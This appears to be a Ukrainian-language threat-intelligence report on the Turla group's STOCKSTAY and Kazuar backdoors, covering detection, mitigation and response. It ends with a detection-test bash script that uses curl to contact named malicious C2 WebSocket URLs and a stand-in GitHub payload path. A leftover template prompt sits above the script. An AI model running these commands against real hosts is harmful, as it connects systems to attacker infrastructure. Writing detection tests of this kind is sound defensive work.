SOC Prime Bias: Критичний

14 Jul 2026 15:35 UTC

Turla (Таємний Бліззард): BACKDOORи STOCKSTAY і Kazuar Описані

Author Photo
SOC Prime Team linkedin icon Стежити
Turla (Таємний Бліззард): BACKDOORи STOCKSTAY і Kazuar Описані
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Резюме

Turla — це давно відома група APT, пов’язана з Росією та ФСБ, відома операціями кібер-шпигунства проти урядових і військових цілей. Група покладається на спеціалізоване шкідливе ПЗ, включаючи бекдори STOCKSTAY та Kazuar, для збереження довгострокового доступу в скомпрометованих середовищах. Вона також часто зловживає легітимними хмарними сервісами, такими як GitHub та Cloudflare, для маскування трафіку командування і контролю.

Розслідування

Звіт досліджує еволюцію наборів інструментів шкідливого ПЗ Turla, зосереджуючись на родинах STOCKSTAY та Kazuar. Він аналізує техніки захоплення інфраструктури групою, використання безсерверних платформ для командування і контролю, а також можливість використання вразливостей, таких як обход шляху WinRAR. Розслідування також підкреслює використання Turla екологічного ключування для зниження впливу на аналіз у пісочниці.

Пом’якшення

Організації повинні розгорнути потужний моніторинг для несанкціонованого використання довірених веб-платформ, таких як GitHub і Cloudflare, коли шаблони трафіку виглядають аномальними. Своєчасне виправлення вразливостей, таких як CVE-2025-8088 є ключовим для запобігання несанкціонованого запису файлів. Захисники також повинні стежити за несанкціонованою установкою кореневих сертифікатів та підозрілими виконаннями PowerShell або VBScript, які можуть вказувати на активність Turla.

Реагування

Якщо зафіксована активність Turla, реагуючі повинні ізолювати уражені хости та розслідувати на наявність несанкціонованих локальних адміністративних облікових записів. Повинен бути проведений детальний огляд дерев процесів, щоб виявити завантаження DLL з легітимними бінарниками, такими як утиліти від NVIDIA або Brother Printer. Телеметрія мережі також повинна бути перевірена на наявність незвичайного трафіку WebSocket, а сховище довіри машини — на підозрілі зміни сертифікатів.

Потік атаки

Виконання симуляції

Передумова: Перевірка телеметрії та базового рівня перед польотом повинна бути пройдена.

Обґрунтування: У цьому розділі детально описано точне виконання техніки противника (TTP), розробленої для запуску правила виявлення. Команди та наративи ПОВИННІ прямо відображати визначені TTP та прагнути генерувати точну телеметрію, очікувану логікою виявлення. Абстрактні або не пов’язані приклади призведуть до неправильного діагнозу.

  • Наратив атаки та команди: Супротивник успішно встановив опору і зараз намагається встановити комунікацію C2. Щоб уникнути виявлення, вони використовують підхід «життя за рахунок натури», звертаючись до платформи без серверів, розміщеної на onrender.com через з’єднання WebSocket. Одночасно вони намагаються завантажити корисне навантаження другого етапу з публічного репозиторію GitHub, щоб зливатися з трафіком розробників. Симуляція буде використовувати curl and wscat (якщо доступно) або стандартні веб-запити для створення специфічних шаблонів URL, визначених у логіці виявлення.

  • Скрипт регресійного тестування: [Provide the exact, self-contained, and executable code snippet for the simulation.]

    #!/bin/bash
    # Скрипт симуляції для STOCKSTAY C2 Verification Detection
    
    echo "[+] Старт симуляції: STOCKSTAY C2 TTP's"
    
    # 1. Тригер: WebSocket C2 через Render (специфічний URL)
    echo "[*] Симуляція з'єднання WebSocket до шкідливого URL Render..."
    curl -k "wss://google-ai-labs-it.onrender.com/ws"
    
    # 2. Тригер: WebSocket C2 через Glitch (специфічний URL)
    echo "[*] Симуляція з'єднання WebSocket до шкідливого URL Glitch..."
    curl -k "wss://wool-basalt-clock.glitch.me/ws"
    
    # 3. Тригер: GitHub підготовка (широке доменне співпадіння)
    echo "[*] Симуляція розміщення корисного навантаження через GitHub..."
    curl -I "https://github.com/malicious-actor/payload-repo/raw/main/shell.sh"
    
    echo "[+] Симуляція завершена. Перевірте SIEM на наявність сигналів тривоги."
  • Команди очищення:

    # Постійні артефакти не створюються на хості цією симуляцією.
    # Переконайтеся, що будь-які тимчасові bash-файли видалено, якщо були створені.
    rm -f simulation_stockstay.sh